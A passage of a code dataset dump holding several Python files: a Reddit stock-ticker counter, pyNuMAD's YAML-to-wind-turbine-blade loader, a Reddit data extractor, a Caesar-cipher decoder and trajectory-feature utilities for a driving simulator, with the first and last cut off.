words))\n\n if len(tickers)>0:\n for ticker in tickers:\n if(ticker.upper()[1:5] not in redditTickers):\n redditTickers[ticker.upper()[1:5]] = 1\n else:\n redditTickers[ticker.upper()[1:5]]+=1\n\nredditTicker= {}\nfor key, value in redditTickers.items():\n if key.isalpha():\n redditTicker[key]=value\n\nstockTickers = dict(sorted(redditTicker.items(), key=lambda x: x[1],reverse=True))\nstockVal = {}\nfor key in stockTickers.items():\n value = finnhub_client.quote(key)\n if (value['t'] !=0):\n stockVal[key] = value\n \n#Formats dictionary in a nice easy to read form\npprint.pprint(stockVal)","repo_name":"adshayanB/redditStonks","sub_path":"stonks.py","file_name":"stonks.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"72671470513","text":"import yaml\nimport numpy as np\nimport logging\nfrom scipy.stats import mode\n\nfrom pynumad.utils.misc_utils import (\n LARCetaT,\n LARCetaL,\n _parse_data,\n full_keys_from_substrings,\n)\nfrom pynumad.io.airfoil_to_xml import airfoil_to_xml\nfrom pynumad.utils.interpolation import interpolator_wrap\nfrom pynumad.objects.component import Component\nfrom pynumad.objects.airfoil import Airfoil\nfrom pynumad.objects.material import Material\nfrom pynumad.objects.definition import Definition\n\n\ndef yaml_to_blade(blade, filename: str, write_airfoils: bool = False):\n \"\"\"\n This method writes blade information from a .yaml file to a Blade object.\n The yaml file is expected to be formatted according to the WindIO ontology.\n See https://windio.readthedocs.io/en/stable/source/turbine.html.\n\n Parameters\n ----------\n blade : Blade\n filename : string\n path to .yaml file\n write_airfoils : bool\n Set true to write airfoil files while reading in data. Defaults to false.\n\n Returns\n -------\n blade : Blade\n input blade object populated with yaml data\n \"\"\"\n\n # Read in yaml file as a nested dictionary\n with open(filename) as blade_yaml:\n # data = yaml.load(blade_yaml,Loader=yaml.FullLoader)\n data = yaml.load(blade_yaml, Loader=yaml.Loader)\n\n # initialize definition\n definition = Definition()\n blade.definition = definition\n\n # Obtain blade outer shape bem\n blade_outer_shape_bem = data[\"components\"][\"blade\"][\"outer_shape_bem\"]\n\n # obtain hub outer shape bem\n try:\n hub_outer_shape_bem = data[\"components\"][\"hub\"][\"outer_shape_bem\"]\n except KeyError:\n # older versions of wind ontology do not have 'outer_shape_bem' subsection for hub data\n hub_outer_shape_bem = data[\"components\"][\"hub\"]\n\n # obtain blade internal structure\n blade_internal_structure = data[\"components\"][\"blade\"][\"internal_structure_2d_fem\"]\n\n # obtain airfoil data\n af_data = data[\"airfoils\"]\n\n # obtain material data\n mat_data = data[\"materials\"]\n\n ### STATIONS / AIRFOILS\n _add_stations(\n definition,\n blade_outer_shape_bem,\n hub_outer_shape_bem,\n af_data,\n filename,\n write_airfoils,\n )\n blade.ispan = definition.ispan\n\n ### MATERIALS\n _add_materials(definition, mat_data)\n\n ## Blade Components\n\n # Update \"grid\" and \"values\" keys to cover the whole span of the blade\n blade_internal_structure = update_internal_structure(\n blade_internal_structure, blade_outer_shape_bem\n )\n\n blade_structure_dict = {\n blade_internal_structure[\"layers\"][i][\"name\"].lower(): blade_internal_structure[\n \"layers\"\n ][i]\n for i in range(len(blade_internal_structure[\"layers\"]))\n }\n # Spar caps\n _add_spar_caps(definition, blade_structure_dict)\n\n # TE Bands\n _add_te_bands(definition, blade_structure_dict)\n\n # LE Bands\n _add_le_bands(definition, blade_structure_dict)\n\n ### COMPONENTS\n _add_components(definition, blade_internal_structure, blade_structure_dict)\n\n blade.update_blade()\n # save(blade_name)\n # BladeDef_to_NuMADfile(obj,numad_name,matdb_name,numad_af_folder)\n return blade\n\n\ndef _add_stations(\n definition,\n blade_outer_shape_bem,\n hub_outer_shape_bem,\n af_data,\n file: str,\n write_airfoils,\n):\n # Obtaining some parameters not explicitly given in YAML file\n L = np.ceil(blade_outer_shape_bem[\"reference_axis\"][\"z\"][\"values\"][-1])\n R = L + hub_outer_shape_bem[\"diameter\"] / 2\n L = R - hub_outer_shape_bem[\"diameter\"] / 2\n definition.span = np.multiply(\n np.transpose(blade_outer_shape_bem[\"chord\"][\"grid\"]), L\n )\n definition.ispan = definition.span\n\n # Aerodynamic properties\n # using interp because yaml can have different r/R for twist and chord\n temp_x = np.transpose(blade_outer_shape_bem[\"twist\"][\"grid\"])\n temp_y = blade_outer_shape_bem[\"twist\"][\"values\"]\n definition.degreestwist = (\n interpolator_wrap(np.multiply(temp_x, L), np.transpose(temp_y), definition.span)\n * 180.0\n / np.pi\n )\n definition.chord = interpolator_wrap(\n np.multiply(np.transpose(blade_outer_shape_bem[\"chord\"][\"grid\"]), L),\n np.transpose(blade_outer_shape_bem[\"chord\"][\"values\"]),\n definition.span,\n )\n af_dir_names = []\n for i in range(len(af_data)):\n af_dir_names.append(af_data[i][\"name\"])\n numstations = len(blade_outer_shape_bem[\"airfoil_position\"][\"labels\"])\n tc = [None] * numstations\n aero_cent = [None] * numstations\n definition.stations = []\n for i in range(numstations):\n _, _, iaf_temp = np.intersect1d(\n blade_outer_shape_bem[\"airfoil_position\"][\"labels\"][i],\n af_dir_names,\n \"stable\",\n return_indices=True,\n )\n IAF = iaf_temp[0] # Expect only one index of intersection\n tc[i] = af_data[IAF][\"relative_thickness\"]\n tc_xL = blade_outer_shape_bem[\"airfoil_position\"][\"grid\"][i]\n aero_cent[i] = af_data[IAF][\"aerodynamic_center\"]\n x = np.array(af_data[IAF][\"coordinates\"][\"x\"], dtype=float)\n y = np.array(af_data[IAF][\"coordinates\"][\"y\"], dtype=float)\n xf_coords = np.stack((x, y), 1)\n\n # find coordinate direction (clockwise or counter-clockwise) Winding\n # Number. clockwise starting at (1,0) is correct\n with np.errstate(divide=\"ignore\", invalid=\"ignore\"):\n if (\n np.nanmean(np.gradient(np.arctan(xf_coords[:, 1] / xf_coords[:, 0])))\n > 0\n ):\n xf_coords = np.flipud(xf_coords)\n\n if write_airfoils:\n import os\n\n out_folder = \"yaml2BladeDef_\" + file.replace(\".yaml\", \"\")\n # blade_name = out_folder + '/' + file.replace('.yaml','') + '_definition.mat'\n # matdb_name =...\n # numade_name =...\n\n # Creating folders\n os.makedirs(out_folder + \"/af_coords/\", exist_ok=True)\n # os.makedirs(out_folder+'/af_polars/', exist_ok = True)\n os.makedirs(out_folder + \"/airfoil/\", exist_ok=True)\n airfoil_to_xml(\n xf_coords,\n blade_outer_shape_bem[\"airfoil_position\"][\"labels\"][i],\n out_folder\n + \"/af_coords/\"\n + blade_outer_shape_bem[\"airfoil_position\"][\"labels\"][i]\n + \".txt\",\n )\n\n ref = blade_outer_shape_bem[\"airfoil_position\"][\"labels\"][i]\n af = Airfoil(coords=xf_coords, reference=ref)\n af.resample(spacing=\"half-cosine\")\n definition.add_station(af, tc_xL * L)\n\n definition.percentthick = np.multiply(\n interpolator_wrap(\n np.multiply(blade_outer_shape_bem[\"airfoil_position\"][\"grid\"], L),\n tc,\n definition.span,\n ),\n 100,\n )\n definition.aerocenter = interpolator_wrap(\n np.multiply(blade_outer_shape_bem[\"airfoil_position\"][\"grid\"], L),\n aero_cent,\n definition.span,\n )\n definition.chordoffset = interpolator_wrap(\n np.multiply(np.transpose(blade_outer_shape_bem[\"pitch_axis\"][\"grid\"]), L),\n np.transpose(blade_outer_shape_bem[\"pitch_axis\"][\"values\"]),\n definition.span,\n )\n definition.natural_offset = 0\n definition.prebend = interpolator_wrap(\n np.multiply(\n np.transpose(blade_outer_shape_bem[\"reference_axis\"][\"x\"][\"grid\"]), L\n ),\n np.transpose(blade_outer_shape_bem[\"reference_axis\"][\"x\"][\"values\"]),\n definition.span,\n )\n definition.sweep = interpolator_wrap(\n np.multiply(\n np.transpose(blade_outer_shape_bem[\"reference_axis\"][\"y\"][\"grid\"]), L\n ),\n np.transpose(blade_outer_shape_bem[\"reference_axis\"][\"y\"][\"values\"]),\n definition.span,\n )\n\n # for i in range(len(tc)):\n # afc = AirfoilDef(out_folder +\n # '/af_coords/' +\n # blade_outer_shape_bem['airfoil_position']['labels'][i] +\n # '.txt')\n # definition.add_station(afc,np.multiply(tc_xL[i],L))\n\n # NOTE nothing happens to afc? Tentatively ignoring...\n # If i return to this make sure to listify the afcs\n ### AIRFOILS\n # for i in range(len(tc)):\n # afc = AirfoilDef(out_folder + '/af_coords/' +\n # blade_outer_shape_bem['airfoil_position']['labels'][i] +\n # '.txt')\n # definition.add_station(afc,np.multiply(tc_xL[i],L))\n # afc.resample #NOTE afc isn't used after this... why resample?\n return\n\n\ndef _add_materials(definition, material_data):\n materials_dict = dict()\n for i in range(len(material_data)):\n cur_mat = Material()\n cur_mat.name = material_data[i][\"name\"]\n if material_data[i][\"orth\"] == 1:\n cur_mat.type = \"orthotropic\"\n else:\n cur_mat.type = \"isotropic\"\n # Add ply thickness option if ply thickness exists in yaml\n try:\n cur_mat.layerthickness = material_data[i][\"ply_t\"] * 1000\n except KeyError:\n msg = \"material ply thickness \" + \\\n material_data[i][\"name\"] + \\\n \"not defined, assuming 1 mm thickness\"\n logging.debug(msg)\n cur_mat.layerthickness = 1\n\n finally:\n pass\n\n # first\n cur_mat.uts = _parse_data(material_data[i][\"Xt\"])\n cur_mat.ucs = -_parse_data(material_data[i][\"Xc\"])\n cur_mat.uss = _parse_data(material_data[i][\"S\"])\n cur_mat.xzit = 0.3\n cur_mat.xzic = 0.25\n cur_mat.yzit = 0.3\n cur_mat.yzic = 0.25\n try:\n cur_mat.g1g2 = material_data[i].get(\"GIc\", 0) / material_data[i].get(\n \"GIIc\", 0\n )\n except ZeroDivisionError:\n cur_mat.g1g2 = np.nan\n if \"alp0\" in material_data[i]:\n cur_mat.alp0 = _parse_data(material_data[i][\"alp0\"])\n cur_mat.etat = LARCetaT(cur_mat.alp0)\n else:\n cur_mat.alp0 = None\n cur_mat.etat = None\n try:\n # test if property is a list\n material_data[i][\"E\"] + []\n except TypeError:\n cur_mat.ex = _parse_data(material_data[i][\"E\"])\n cur_mat.ey = _parse_data(material_data[i][\"E\"])\n cur_mat.ez = _parse_data(material_data[i][\"E\"])\n cur_mat.gxy = _parse_data(material_data[i][\"G\"])\n cur_mat.gxz = _parse_data(material_data[i][\"G\"])\n cur_mat.gyz = _parse_data(material_data[i][\"G\"])\n cur_mat.prxy = _parse_data(material_data[i][\"nu\"])\n cur_mat.prxz = _parse_data(material_data[i][\"nu\"])\n cur_mat.pryz = _parse_data(material_data[i][\"nu\"])\n cur_mat.etal = LARCetaL(cur_mat.uss, cur_mat.ucs, cur_mat.alp0)\n else:\n cur_mat.ex = _parse_data(material_data[i][\"E\"][0])\n cur_mat.ey = _parse_data(material_data[i][\"E\"][1])\n cur_mat.ez = _parse_data(material_data[i][\"E\"][2])\n cur_mat.gxy = _parse_data(material_data[i][\"G\"][0])\n cur_mat.gxz = _parse_data(material_data[i][\"G\"][1])\n cur_mat.gyz = _parse_data(material_data[i][\"G\"][2])\n cur_mat.prxy = _parse_data(material_data[i][\"nu\"][0])\n cur_mat.prxz = _parse_data(material_data[i][\"nu\"][1])\n cur_mat.pryz = _parse_data(material_data[i][\"nu\"][2])\n cur_mat.etal = LARCetaL(cur_mat.uss[0], cur_mat.ucs[1], cur_mat.alp0)\n try:\n cur_mat.m = material_data[i][\"m\"]\n except KeyError:\n msg = f\"No fatigue exponent found for material: {material_data[i]['name']}\"\n logging.debug(msg)\n cur_mat.density = material_data[i][\"rho\"]\n # cur_mat.dens = mat_data[i]['rho']\n cur_mat.drydensity = material_data[i][\"rho\"]\n if (\n \"description\" in material_data[i].keys()\n and \"source\" in material_data[i].keys()\n ):\n desc_sourc = [\n material_data[i][\"description\"],\n \", \",\n material_data[i][\"source\"],\n ]\n cur_mat.reference = \"\".join(desc_sourc)\n else:\n cur_mat.reference = []\n\n materials_dict[cur_mat.name] = cur_mat\n definition.materials = materials_dict\n return\n\n\ndef _add_components(definition, blade_internal_structure, blade_structure_dict):\n N_layer_comp = len(blade_internal_structure[\"layers\"])\n component_list = list()\n for i in range(N_layer_comp):\n i_component_data = blade_internal_structure[\"layers\"][i]\n cur_comp = Component()\n cur_comp.group = 0\n cur_comp.name = i_component_data[\"name\"]\n # comp['material'] = blade_internal_structure['layers']{i}['material'];\n # mat_names = [mat.name for mat in definition.materials]\n # C,IA,IB = np.intersect1d(mat_names,i_component_data['material'],return_indices=True)\n cur_comp.materialid = i_component_data[\"material\"]\n try:\n cur_comp.fabricangle = np.mean(\n i_component_data[\"fiber_orientation\"][\"values\"]\n )\n finally:\n pass\n if \"spar\" in i_component_data[\"name\"].lower():\n cur_comp.imethod = \"pchip\"\n else:\n cur_comp.imethod = \"linear\"\n # cur_comp.control_points[:,0] = np.transpose(i_component_data['thickness']['grid'])\n cptemp1 = np.transpose(i_component_data[\"thickness\"][\"grid\"])\n temp_n_layer = (\n np.multiply(np.transpose(i_component_data[\"thickness\"][\"values\"]), 1000.0)\n / definition.materials[cur_comp.materialid].layerthickness\n )\n I_round_up = np.flatnonzero((temp_n_layer > 0.05) & (temp_n_layer < 0.5))\n cptemp2 = np.round(\n np.multiply(np.transpose(i_component_data[\"thickness\"][\"values\"]), 1000.0)\n / definition.materials[cur_comp.materialid].layerthickness\n )\n cur_comp.control_points = np.stack((cptemp1, cptemp2), axis=1)\n # if I_round_up.size > 0:\n # cur_comp.control_points[I_round_up,1] = 1 # increase n_layers from 0 to 1 for 0.05 0:\n for key in key_list:\n component_dict[key].hpextents = [\"b\"]\n component_dict[key].lpextents = [\"b\"]\n component_dict[key].group = 1\n elif len(key_list) == 0:\n raise ValueError(\"No fore web layers found found\")\n\n key_list = full_keys_from_substrings(component_dict.keys(), [\"web\", \"aft\"]) # Try 1\n if len(key_list) == 0:\n key_list = full_keys_from_substrings(component_dict.keys(), [\"web\", \"0\"]) # Try 2\n if len(key_list) == 0:\n key_list = full_keys_from_substrings(\n component_dict.keys(), [\"web\", \"rear\"]\n ) # Try 3\n\n if len(key_list) > 0:\n for key in key_list:\n component_dict[key].hpextents = [\"c\"]\n component_dict[key].lpextents = [\"c\"]\n component_dict[key].group = 2\n elif len(key_list) == 0:\n raise ValueError(\"No rear web layers found found\")\n\n ### add components to blade\n definition.components = component_dict\n return\n\n\ndef update_internal_structure(blade_internal_structure, blade_outer_shape_bem):\n bladeParts = [\"layers\", \"webs\"]\n # Make sure each definition.ispan has layer thicknesses and widths\n fullSpanGrid = np.array(blade_outer_shape_bem[\"chord\"][\"grid\"])\n nStations = len(fullSpanGrid)\n keysToModify = {\n \"offset_y_pa\",\n \"thickness\",\n \"fiber_orientation\",\n \"width\",\n \"start_nd_arc\",\n \"end_nd_arc\",\n }\n for part_name in bladeParts:\n N_layer_comp = len(blade_internal_structure[part_name])\n for currentLayer in range(N_layer_comp):\n layerKeys = set(blade_internal_structure[part_name][currentLayer].keys())\n\n for currentKey in keysToModify.intersection(layerKeys):\n grid = blade_internal_structure[part_name][currentLayer][currentKey][\n \"grid\"\n ]\n values = blade_internal_structure[part_name][currentLayer][currentKey][\n \"values\"\n ]\n startStationLoc = grid[0]\n endStationLoc = grid[-1]\n\n subSpanGridIndex = np.where(\n (fullSpanGrid >= startStationLoc) & (fullSpanGrid <= endStationLoc)\n )[0]\n\n # iterpolate fullSpanGrid locations onto layer grid defined in the yamle file for the layer\n subSpanValues = interpolator_wrap(\n grid, values, fullSpanGrid[subSpanGridIndex], \"pchip\"\n )\n fullSpanValues = np.zeros(nStations)\n\n fullSpanValues[subSpanGridIndex] = subSpanValues\n\n # Reset\n blade_internal_structure[part_name][currentLayer][currentKey][\n \"grid\"\n ] = fullSpanGrid\n blade_internal_structure[part_name][currentLayer][currentKey][\n \"values\"\n ] = fullSpanValues\n return blade_internal_structure\n\n\ndef _add_spar_caps(definition, blade_structure_dict):\n sparCapKeys = full_keys_from_substrings(blade_structure_dict.keys(), [\"spar\"])\n if len(sparCapKeys) != 2:\n raise ValueError(\"Incorrect number of spar cap components\")\n\n for iSparCap in range(2):\n if \"suc\" in blade_structure_dict[sparCapKeys[iSparCap]][\"side\"].lower():\n lpSideIndex = iSparCap\n if \"pres\" in blade_structure_dict[sparCapKeys[iSparCap]][\"side\"].lower():\n hpSideIndex = iSparCap\n\n definition.sparcapwidth_lp = (\n blade_structure_dict[sparCapKeys[lpSideIndex]][\"width\"][\"values\"] * 1000\n )\n try:\n definition.sparcapoffset_lp = (\n blade_structure_dict[sparCapKeys[lpSideIndex]][\"offset_y_pa\"][\"values\"]\n * 1000\n )\n except KeyError:\n definition.sparcap_start_nd_arc = blade_structure_dict[\n sparCapKeys[lpSideIndex]\n ][\"start_nd_arc\"][\"values\"]\n definition.sparcap_end_nd_arc = blade_structure_dict[sparCapKeys[lpSideIndex]][\n \"end_nd_arc\"\n ][\"values\"]\n\n definition.sparcapwidth_hp = (\n blade_structure_dict[sparCapKeys[hpSideIndex]][\"width\"][\"values\"] * 1000\n )\n try:\n definition.sparcapoffset_hp = (\n blade_structure_dict[sparCapKeys[hpSideIndex]][\"offset_y_pa\"][\"values\"]\n * 1000\n )\n except KeyError:\n definition.sparcap_start_nd_arc = blade_structure_dict[\n sparCapKeys[hpSideIndex]\n ][\"start_nd_arc\"][\"values\"]\n definition.sparcap_end_nd_arc = blade_structure_dict[sparCapKeys[hpSideIndex]][\n \"end_nd_arc\"\n ][\"values\"]\n return definition\n\n\ndef _add_te_bands(definition, blade_structure_dict):\n teReinfKeys = full_keys_from_substrings(blade_structure_dict.keys(), [\"te\", \"reinf\"])\n if len(teReinfKeys) == 1:\n definition.teband = (\n blade_structure_dict[teReinfKeys[0]][\"width\"][\"values\"] * 1000 / 2\n )\n elif len(teReinfKeys) == 2:\n definition.teband = (\n (\n blade_structure_dict[teReinfKeys[0]][\"width\"][\"values\"]\n + blade_structure_dict[teReinfKeys[1]][\"width\"][\"values\"]\n )\n * 1000\n / 2\n )\n else:\n raise ValueError(\"Unknown number of TE reinforcements\")\n return definition\n\n\ndef _add_le_bands(definition, blade_structure_dict):\n leReinfKeys = full_keys_from_substrings(blade_structure_dict.keys(), [\"le\", \"reinf\"])\n if len(leReinfKeys) == 1:\n definition.leband = (\n blade_structure_dict[leReinfKeys[0]][\"width\"][\"values\"] * 1000 / 2\n )\n elif len(leReinfKeys) == 2:\n definition.leband = (\n (\n blade_structure_dict[leReinfKeys[0]][\"width\"][\"values\"]\n + blade_structure_dict[leReinfKeys[1]][\"width\"][\"values\"]\n )\n * 1000\n / 2\n )\n else:\n raise ValueError(\"Invalid number of LE reinforcements\")\n return definition\n","repo_name":"sandialabs/pyNuMAD","sub_path":"src/pynumad/io/yaml_to_blade.py","file_name":"yaml_to_blade.py","file_ext":"py","file_size_in_byte":24947,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"18622752633","text":"import os\nfrom dataclasses import asdict, dataclass, field\n\nimport pandas as pd\nimport praw\n\nfrom tweeran.nlp import clean, is_text_relevant\n\nMAX_ENTRIES_DEFAULT = 10000\n\nFEATURES_SUBMISSION = [\"id\", \"created_utc\", \"author\", \"ups\", \"downs\",\n \"view_count\", \"score\", \"subreddit\", \"num_comments\",\n \"title\", \"selftext\"]\nFEATURES_COMMENT = [\"id\", \"created_utc\", \"author\", \"body\", \"score\"]\nFEATURES_USER = [\"id\", \"created_utc\", \"name\", \"comment_karma\", \"is_gold\"]\n\n\n@dataclass\nclass RedditExtractionResult:\n submissions: pd.DataFrame\n comments: pd.DataFrame\n users: pd.DataFrame\n\n\n@dataclass\nclass RedditClientConfig:\n username: str | None = field(default=os.getenv(\"REDDIT_USERNAME\"))\n password: str | None = field(default=os.getenv(\"REDDIT_PASSWORD\"))\n client_id: str | None = field(default=os.getenv(\"REDDIT_CLIENTID\"))\n client_secret: str | None = field(default=os.getenv(\"REDDIT_CLIENTSECRET\"))\n\n\nclass RedditExtractionManager:\n client: praw.Reddit\n subreddits: list[str]\n event_wikidata_id: str\n max_entries: int\n\n def __init__(\n self,\n subreddits: list[str],\n event_wikidata_id: str,\n max_entries: int = MAX_ENTRIES_DEFAULT,\n client_config: RedditClientConfig = RedditClientConfig()\n ):\n self.subreddits = subreddits\n self.event_wikidata_id = event_wikidata_id\n self.max_entries = max_entries\n self.client = praw.Reddit(\n **asdict(client_config), user_agent=\"tweener\")\n\n def run(self) -> RedditExtractionResult:\n comments = []\n submissions = []\n submissions_ids: set[str] = set()\n usernames: set[str] = set()\n\n for subreddit_name in self.subreddits:\n subreddit = self.client.subreddit(subreddit_name)\n for s in subreddit.top(limit=self.max_entries):\n if (\n not is_text_relevant(self.event_wikidata_id, s.title) and\n not is_text_relevant(self.event_wikidata_id, s.selftext)\n ):\n continue\n submissions.append({f: clean(getattr(s, f))\n for f in FEATURES_SUBMISSION})\n submissions_ids.add(s.id)\n usernames.add(s.author)\n\n for c in subreddit.comments(limit=self.max_entries):\n if c.submission.id not in submissions_ids:\n continue\n comments.append({f: clean(getattr(c, f))\n for f in FEATURES_COMMENT})\n usernames.add(c.author)\n\n users = []\n for u in usernames:\n if u is None:\n continue\n result = self.client.redditor(u)\n if result is None:\n continue\n try:\n users.append({f: clean(getattr(result, f))\n for f in FEATURES_USER})\n except Exception as e:\n print(result)\n raise e\n\n return RedditExtractionResult(\n submissions=pd.DataFrame(submissions, columns=FEATURES_SUBMISSION),\n comments=pd.DataFrame(comments, columns=FEATURES_COMMENT),\n users=pd.DataFrame(users, columns=FEATURES_USER))\n","repo_name":"marinoandrea/tweeran","sub_path":"tweeran/extraction/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":3283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70274895793","text":"import sys\nfrom string import ascii_uppercase, digits, punctuation\n\n#cipher dict = {cipher : alphanum}\n\ndef cipher_shift(shift):\n cipher_key = {}\n alphanum = ascii_uppercase + digits\n cipher = alphanum[shift % len(alphanum):] + alphanum[:shift % len(alphanum)]\n i = 0\n while i < len(alphanum):\n cipher_key[cipher[i]] = alphanum[i]\n i += 1\n return cipher_key\n\ndef decode_text(line, shift):\n decoded = []\n for word in line:\n decoded_word = []\n for l in word:\n if l in punctuation:\n decoded_word.append(l)\n continue\n decoded_word.append(shift[l])\n decoded.append(''.join(decoded_word))\n return ' '.join(decoded)\n\ndef main():\n alphanum = ascii_uppercase + digits\n encoded_text = []\n shift = None\n for line in sys.stdin:\n encoded = line.strip().split()\n if shift == None:\n for word in encoded:\n if len(word) == 3:\n i = 0\n while i < len(alphanum) and alphanum[i] != word[0]:\n i += 1\n shift = cipher_shift(i - 19)\n decoded_and = ''\n for l in word:\n if l not in punctuation:\n decoded_and += shift[l]\n if decoded_and != 'THE':\n shift = None\n continue\n else:\n break\n if not shift:\n encoded_text.append(encoded)\n continue\n if encoded_text:\n for e in encoded_text:\n print (decode_text(e, shift))\n encoded_text = None\n print (decode_text(encoded, shift))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jamesoneill54/programming_2","sub_path":"bucketlist/cipher_122.py","file_name":"cipher_122.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5401660874","text":"import torch\nimport torch.nn.functional as F\n\nimport tbsim.dynamics as dynamics\nimport tbsim.utils.tensor_utils as TensorUtils\nfrom tbsim import dynamics as dynamics\nfrom tbsim.configs.base import ExperimentConfig\n\n\ndef get_agent_masks(raw_type):\n \"\"\"\n PERCEPTION_LABELS = [\n \"PERCEPTION_LABEL_NOT_SET\",\n \"PERCEPTION_LABEL_UNKNOWN\",\n \"PERCEPTION_LABEL_DONTCARE\",\n \"PERCEPTION_LABEL_CAR\",\n \"PERCEPTION_LABEL_VAN\",\n \"PERCEPTION_LABEL_TRAM\",\n \"PERCEPTION_LABEL_BUS\",\n \"PERCEPTION_LABEL_TRUCK\",\n \"PERCEPTION_LABEL_EMERGENCY_VEHICLE\",\n \"PERCEPTION_LABEL_OTHER_VEHICLE\",\n \"PERCEPTION_LABEL_BICYCLE\",\n \"PERCEPTION_LABEL_MOTORCYCLE\",\n \"PERCEPTION_LABEL_CYCLIST\",\n \"PERCEPTION_LABEL_MOTORCYCLIST\",\n \"PERCEPTION_LABEL_PEDESTRIAN\",\n \"PERCEPTION_LABEL_ANIMAL\",\n \"AVRESEARCH_LABEL_DONTCARE\",\n ]\n \"\"\"\n veh_mask = (raw_type >= 3) & (raw_type <= 13)\n ped_mask = (raw_type == 14) | (raw_type == 15)\n # veh_mask = veh_mask | ped_mask\n # ped_mask = ped_mask * 0\n return veh_mask, ped_mask\n\n\ndef get_dynamics_types(veh_mask, ped_mask):\n dyn_type = torch.zeros_like(veh_mask)\n dyn_type += dynamics.DynType.UNICYCLE * veh_mask\n dyn_type += dynamics.DynType.DI * ped_mask\n return dyn_type\n\n\ndef raw_to_features(batch_raw):\n \"\"\" map raw src into features of dim 21 \"\"\"\n raw_type = batch_raw[\"raw_types\"]\n pos = batch_raw[\"history_positions\"]\n vel = batch_raw[\"history_velocities\"]\n yaw = batch_raw[\"history_yaws\"]\n mask = batch_raw[\"history_availabilities\"]\n\n veh_mask, ped_mask = get_agent_masks(raw_type)\n\n # all vehicles, cyclists, and motorcyclists\n feature_veh = torch.cat((pos, vel, torch.cos(yaw), torch.sin(yaw)), dim=-1)\n\n # pedestrians and animals\n ped_feature = torch.cat(\n (pos, vel, vel * torch.sin(yaw), vel * torch.cos(yaw)), dim=-1\n )\n\n feature = feature_veh * veh_mask.view(\n [*raw_type.shape, 1, 1]\n ) + ped_feature * ped_mask.view([*raw_type.shape, 1, 1])\n\n type_embedding = F.one_hot(raw_type, 16)\n\n feature = torch.cat(\n (feature, type_embedding.unsqueeze(-2).repeat(1, 1, feature.size(2), 1)),\n dim=-1,\n )\n feature = feature * mask.unsqueeze(-1)\n\n return feature\n\n\ndef raw_to_states(batch_raw):\n raw_type = batch_raw[\"raw_types\"]\n pos = batch_raw[\"history_positions\"]\n vel = batch_raw[\"history_velocities\"]\n yaw = batch_raw[\"history_yaws\"]\n avail_mask = batch_raw[\"history_availabilities\"]\n\n veh_mask, ped_mask = get_agent_masks(raw_type) # [B, (A)]\n\n # all vehicles, cyclists, and motorcyclists\n state_veh = torch.cat((pos, vel, yaw), dim=-1) # [B, (A), T, S]\n # pedestrians and animals\n state_ped = torch.cat((pos, vel * torch.cos(yaw), vel * torch.sin(yaw)), dim=-1) # [B, (A), T, S]\n\n state = state_veh * veh_mask.view(\n [*raw_type.shape, 1, 1]\n ) + state_ped * ped_mask.view([*raw_type.shape, 1, 1]) # [B, (A), T, S]\n\n # Get the current state of the agents\n num = torch.arange(0, avail_mask.shape[-1]).view(1, 1, -1).to(avail_mask.device)\n nummask = num * avail_mask\n last_idx, _ = torch.max(nummask, dim=2)\n curr_state = torch.gather(\n state, 2, last_idx[..., None, None].repeat(1, 1, 1, 4)\n )\n return state, curr_state\n\n\ndef batch_to_raw_ego(data_batch, step_time):\n batch_size = data_batch[\"history_positions\"].shape[0]\n raw_type = torch.ones(batch_size).type(torch.int64).to(data_batch[\"history_positions\"].device) # [B, T]\n raw_type = raw_type * 3 # index for type PERCEPTION_LABEL_CAR\n\n src_pos = torch.flip(data_batch[\"history_positions\"], dims=[-2])\n src_yaw = torch.flip(data_batch[\"history_yaws\"], dims=[-2])\n src_mask = torch.flip(data_batch[\"history_availabilities\"], dims=[-1]).bool()\n\n src_vel = dynamics.Unicycle.calculate_vel(pos=src_pos, yaw=src_yaw, dt=step_time, mask=src_mask)\n src_vel[:, -1] = data_batch[\"curr_speed\"].unsqueeze(-1)\n\n raw = {\n \"history_positions\": src_pos,\n \"history_velocities\": src_vel,\n \"history_yaws\": src_yaw,\n \"raw_types\": raw_type,\n \"history_availabilities\": src_mask,\n \"extents\": data_batch[\"extents\"]\n }\n\n raw = TensorUtils.unsqueeze(raw, dim=1) # Add the agent dimension\n return raw\n\n\ndef raw2feature(pos, vel, yaw, raw_type, mask, lanes=None, add_noise=False):\n \"map raw src into features of dim 21+lane dim\"\n\n \"\"\"\n PERCEPTION_LABELS = [\n \"PERCEPTION_LABEL_NOT_SET\",\n \"PERCEPTION_LABEL_UNKNOWN\",\n \"PERCEPTION_LABEL_DONTCARE\",\n \"PERCEPTION_LABEL_CAR\",\n \"PERCEPTION_LABEL_VAN\",\n \"PERCEPTION_LABEL_TRAM\",\n \"PERCEPTION_LABEL_BUS\",\n \"PERCEPTION_LABEL_TRUCK\",\n \"PERCEPTION_LABEL_EMERGENCY_VEHICLE\",\n \"PERCEPTION_LABEL_OTHER_VEHICLE\",\n \"PERCEPTION_LABEL_BICYCLE\",\n \"PERCEPTION_LABEL_MOTORCYCLE\",\n \"PERCEPTION_LABEL_CYCLIST\",\n \"PERCEPTION_LABEL_MOTORCYCLIST\",\n \"PERCEPTION_LABEL_PEDESTRIAN\",\n \"PERCEPTION_LABEL_ANIMAL\",\n \"AVRESEARCH_LABEL_DONTCARE\",\n ]\n \"\"\"\n dyn_type = torch.zeros_like(raw_type)\n veh_mask = (raw_type >= 3) & (raw_type <= 13)\n ped_mask = (raw_type == 14) | (raw_type == 15)\n veh_mask = veh_mask | ped_mask\n ped_mask = ped_mask * 0\n dyn_type += dynamics.DynType.UNICYCLE * veh_mask\n # all vehicles, cyclists, and motorcyclists\n if add_noise:\n pos_noise = torch.randn(pos.size(0), 1, 1, 2).to(pos.device) * 0.5\n yaw_noise = torch.randn(pos.size(0), 1, 1, 1).to(pos.device) * 0.1\n if pos.ndim == 5:\n pos_noise = pos_noise.unsqueeze(1)\n yaw_noise = yaw_noise.unsqueeze(1)\n feature_veh = torch.cat(\n (\n pos + pos_noise,\n vel,\n torch.cos(yaw + yaw_noise),\n torch.sin(yaw + yaw_noise),\n ),\n 